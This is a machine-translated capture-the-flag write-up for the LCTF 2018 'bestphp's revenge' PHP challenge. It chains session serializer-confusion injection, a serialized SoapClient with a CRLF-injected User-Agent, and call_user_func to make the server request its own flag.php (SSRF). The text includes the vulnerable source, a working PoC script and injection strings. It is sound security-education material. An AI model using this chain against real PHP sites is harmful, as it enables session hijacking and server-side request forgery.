Brush title record: [LCTF] bestphp's revenge

Brush title record: [LCTF] bestphp's revenge

Recurring topic links: https://buuoj.cn/challenges
Reference Links: https://xz.aliyun.com/t/3341#toc-22
sign to see the problem from LCTF WEB PHP deserialization
LCTF2018-bestphp's revenge detailed explanations

This is a web sign LCTF problem? ? excuse me. Now a day has been a bit behind the title. . . .

First, knowledge

Knowledge of these points formed by a chain link, so I speak with the
session deserialization -> soap (ssrf + crlf) -> call_user_func soap-based activation

1, SoapClient trigger deserialization lead ssrf

2, serialize_hander processing session session injection results in different ways

3, crlf vulnerability

Second, problem-solving ideas

First, php deserialization not available class can call php native class reference
using the deserialization PHP native type ,
paste source and poc speaking

//index.php
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET[f],$_POST);
session_start();
if(isset($_GET[name])){
    $_SESSION[name] = $_GET[name];
}
var_dump($_SESSION);
$a = array(reset($_SESSION),'welcome_to_the_lctf2018');
call_user_func($b,$a);
?>

//flag.php
session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
       $_SESSION['flag'] = $flag;
   }
only localhost can get flag!

It is easy to think of fthe incoming extractcover b as a function of what we want, the problem is the use of the back session.
Said first SoapClientreference see SOAP security issues from a few questions CTF

SOAP (Simple Object Access Protocol) is a connection or interface between the client and the Web service or Web service.
Which employs HTTP as the underlying communication protocol, XML format as the data transfer
SOAP message received substantially unidirectional transmission end from the transmitting end, they often perform similar combined request / reply mode.

So if we can call the deserialization SoapClientto flag.phpsend a request, it can be achieved ssrf

I took the problem to be solved is:

• Where trigger deserialization
• How to control the content of deserialized

Here we must know call_user_func()the function if the incoming parameter is the arraytype of case, as a member of the array will be the class name and method, for example, you can start with this question in extract()the cover b into call_user_func(), reset($_SESSION)that is $_SESSION['name'], we can pass name=SoapClient, then finally call_user_func($b, $a)becomes call_user_func(array('SoapClient','welcome_to_the_lctf2018')), that is call_user_func(SoapClient->welcome_to_the_lctf2018), due to the SoapClientno class welcome_to_the_lctf2018this method, it will call the magic method __get()in order to send the request

That SoapClienthow the content control it, paste of poc Gangster

<?php
$target = "http://127.0.0.1/flag.php";
$attack = new SoapClient(null,array('location' => $target,
    'user_agent' => "N0rth3ty\r\nCookie: PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4\r\n",
    'uri' => "123"));
$payload = urlencode(serialize($attack));
echo $payload;

Here also involves crlf, reference [Reserved] and use examples CRLF Injection vulnerability analysis , my understanding is that because http request met two \r\nother words %0d%0a, will the first half as a header analysis, while the remaining part as a body, so if the head is controllable, you can inject crlf achieve modify http request packet. If my understanding is wrong, please correct me big brother.

The poc crlf is the use of fake requests to visit flag.php and save the result in a cookie as PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4a session.

Finally, it is how to make php deserialize the result controllable. This involves the mechanism php anti sequences.

php content of the session is not in memory, but rather a way to store files, storage is to be determined, the default file is stored by the configuration item session.save_handler.
Sess_sessionid stored files are to be named, the contents of the file is the content of the sequence, then after the session value.
The presence of three configuration items in php.ini:

session.save_path=""   --设置session的存储路径
session.save_handler="" --设定用户自定义存储函数，如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
session.serialize_handler   string --定义用来序列化/反序列化的处理器名字。默认是php(5.5.4后改为php_serialize)

PHP processor with built-in time will be used to store $ _SESSION data serialization and deserialization, less commonly used, corresponding to three different processing formats:

processor	Corresponding to the storage format
php	+ Through + keys vertical serialize () function value deserialization process
php_binary	ASCII characters corresponding to the length of the key name after the + + keys serialize () function value deserialization process
php_serialize(php>=5.5.4)	After serialize () array processing functions deserialization

Configuration options session.serialize_handler, the processor may be provided and used when serializing the deserialized through option.

If the processor used in the PHP $ _SEESION data stored deserialize and serialize the use of different processors, the cause data can not be correctly deserialize, by special forgery, counterfeiting and even arbitrary data.

When the storage process is php_serialize then php to call processing, if the injection time data a=|O:4:"test":0:{}, then the contents of the session are a:1:{s:1:"a";s:16:"|O:4:"test":0:{}";}then a:1:{s:1:"a";s:16:"be resolved into php keys, a test object is later injection.

We just started call_user_funcnot used, can be constructed session_start(['serialize_handler'=>'php_serialize'])to achieve the effect of the injection.

Third, the problem-solving steps

The resulting first injection session poc

Trigger deserialization transmission request so SoapClient

cookie access can be obtained by carrying the flag poc